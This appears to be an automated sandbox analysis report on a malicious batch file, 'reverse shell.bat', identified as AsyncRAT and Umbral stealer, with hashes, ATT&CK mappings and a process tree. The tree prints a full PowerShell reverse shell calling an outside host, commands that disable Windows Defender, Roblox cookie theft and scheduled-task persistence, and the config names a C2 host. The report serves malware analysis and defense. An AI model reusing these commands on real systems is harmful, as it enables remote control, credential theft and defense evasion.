Overview

overview

10

Static

static

1

reverse shell.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-11-2024 12:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    reverse shell.bat

  • Size

    953B

  • MD5

    a34e9091b3cb1b1fddb64dd1e6eafe8b

  • SHA1

    73a9ce1190dbf81871d72cc98b7d81487bad17dc

  • SHA256

    b79c63a1f5777b977a48085de65f8041d1d6b2d5d569224b0f81b343578f1803

  • SHA512

    65391766927605aef01be482578b0f11fc9a9dfd0ee0b0a62ff1df6d07346a4b6d5a0d7409983f3fcd7b8a98e5376fd15bc8961b477be683e88ddf8e5619d0b7

Score
10/10
asyncratumbraldefaultdiscoveryexecutionratspywarestealer

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

technical-southwest.gl.at.ply.gg:58694

Attributes
  • delay

    1

  • install

    true

  • install_file

    WINDOWS.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\reverse shell.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4560
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -ExecutionPolicy Bypass -Command "$LHOST = 'radio-ebay.gl.at.ply.gg'; $LPORT = 10404; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) } catch { $_ }; $StreamWriter.Write('$Output`n'); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3116
      • C:\Users\Admin\Desktop\output.exe
        "C:\Users\Admin\Desktop\output.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1644
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1692
        • C:\Windows\SYSTEM32\attrib.exe
          "attrib.exe" +h +s "C:\Users\Admin\Desktop\output.exe"
          4⤵
          • Views/modifies file attributes
          PID:3660
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\output.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2408
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of AdjustPrivilegeToken
          PID:3216
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2032
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1172
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          4⤵
            PID:2564
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            4⤵
              PID:4616
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              4⤵
              • Command and Scripting Interpreter: PowerShell
              PID:1828
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:2164
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\output.exe" && pause
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Suspicious use of WriteProcessMemory
              PID:3284
              • C:\Windows\system32\PING.EXE
                ping localhost
                5⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:3844
          • C:\Users\Admin\Desktop\Loader.exe
            "C:\Users\Admin\Desktop\Loader.exe"
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1624
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3192
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'
                5⤵
                • Scheduled Task/Job: Scheduled Task
                PID:400
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDF25.tmp.bat""
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2800
              • C:\Windows\system32\timeout.exe
                timeout 3
                5⤵
                • Delays execution with timeout.exe
                PID:4692
              • C:\Users\Admin\AppData\Roaming\WINDOWS.exe
                "C:\Users\Admin\AppData\Roaming\WINDOWS.exe"
                5⤵
                • Executes dropped EXE
                PID:1608

      Network

      MITRE ATT&CK Enterprise v15

      Reconnaissance

      Resource Development

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Persistence

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Privilege Escalation

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Defense Evasion

      Hide Artifacts

      1
      T1564

      Hidden Files and Directories

      1
      T1564.001

      Credential Access

      Credentials from Password Stores

      1
      T1555

      Credentials from Web Browsers

      1
      T1555.003

      Unsecured Credentials

      1
      T1552

      Credentials In Files

      1
      T1552.001

      Discovery

      Query Registry

      2
      T1012

      Remote System Discovery

      1
      T1018

      System Information Discovery

      3
      T1082

      System Network Configuration Discovery

      1
      T1016

      Internet Connection Discovery

      1
      T1016.001

      Lateral Movement

      Collection

      Data from Local System

      1
      T1005

      Command and Control

      Exfiltration

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        276798eeb29a49dc6e199768bc9c2e71

        SHA1

        5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

        SHA256

        cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

        SHA512

        0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        2984662ba3f86d7fcf26758b5b76754d

        SHA1

        bc2a43ffd898222ee84406313f3834f226928379

        SHA256

        f0815f797b0c1829745dd65985f28d459688f91ceb2f3d76fed2d4309589bcde

        SHA512

        a06251a7a14559ebf5627a3c6b03fda9ded1d4ee44991283c824ccf5011cdf67665696d2d9b23507cbb3e3b9943b9e9f79ef28d3657eb61fb99920225417ab11

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        77d622bb1a5b250869a3238b9bc1402b

        SHA1

        d47f4003c2554b9dfc4c16f22460b331886b191b

        SHA256

        f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

        SHA512

        d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        948B

        MD5

        985b3105d8889886d6fd953575c54e08

        SHA1

        0f9a041240a344d82bac0a180520e7982c15f3cd

        SHA256

        5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

        SHA512

        0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ulvc0h03.zap.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\tmpDF25.tmp.bat
        Filesize

        151B

        MD5

        59d271b5196305a5d0f1a5de6da135f6

        SHA1

        d9cc0613b4227c53122c298449aac2ce52b34f83

        SHA256

        7396230cb1fb7ba5a08951509f00919ee51be82f7ae20ef8a2df2c52a03b4578

        SHA512

        66c4c9773152aca642c14fc9d8936fe89a4bcf929d1f3fd6f84eda3a7fe1663f8f7d3b65b7f30bbf6b667ee65b4ae271cc82667be5bfde250615470cbf96ecc5

        Download Submit

      • C:\Users\Admin\Desktop\Loader.exe
        Filesize

        63KB

        MD5

        7ceb11ebb7a55e33a82bc3b66f554e79

        SHA1

        8dfd574ad06ded662d92d81b72f14c1914ac45b5

        SHA256

        aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603

        SHA512

        d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd

        Download Submit

      • C:\Users\Admin\Desktop\output.exe
        Filesize

        227KB

        MD5

        96fc8b45a92d736087ac43746a142cf4

        SHA1

        35999912f4405f21f5068841581d1e1babf55a4b

        SHA256

        408dca374549b037529ff6b200f1fd3a9105d3f531805213e8750d3f3463ab1a

        SHA512

        b6938308458eab4412d130c1c0f5b5104f1e98ab714f659ee27d8d033dbbf9608c98f592bedcb6ff51f0f8f6a7fd4f6705783e0fbcdc900d743a8bf6416aaa16

        Download Submit

      • memory/1624-48-0x0000000000CD0000-0x0000000000CE6000-memory.dmp

        Filesize

        88KB

        Download

      • memory/1644-119-0x000001EC36920000-0x000001EC36932000-memory.dmp

        Filesize

        72KB

        Download

      • memory/1644-32-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1644-33-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1644-147-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1644-140-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1644-139-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1644-118-0x000001EC368F0000-0x000001EC368FA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/1644-74-0x000001EC4F120000-0x000001EC4F196000-memory.dmp

        Filesize

        472KB

        Download

      • memory/1644-75-0x000001EC4F1A0000-0x000001EC4F1F0000-memory.dmp

        Filesize

        320KB

        Download

      • memory/1644-76-0x000001EC368B0000-0x000001EC368CE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/1644-31-0x000001EC34B30000-0x000001EC34B70000-memory.dmp

        Filesize

        256KB

        Download

      • memory/3116-14-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3116-10-0x0000016BF19A0000-0x0000016BF19C2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3116-12-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3116-13-0x00007FFB25BC3000-0x00007FFB25BC5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3116-126-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3116-11-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3116-15-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3116-0-0x00007FFB25BC3000-0x00007FFB25BC5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3116-16-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

        Filesize

        10.8MB

        Download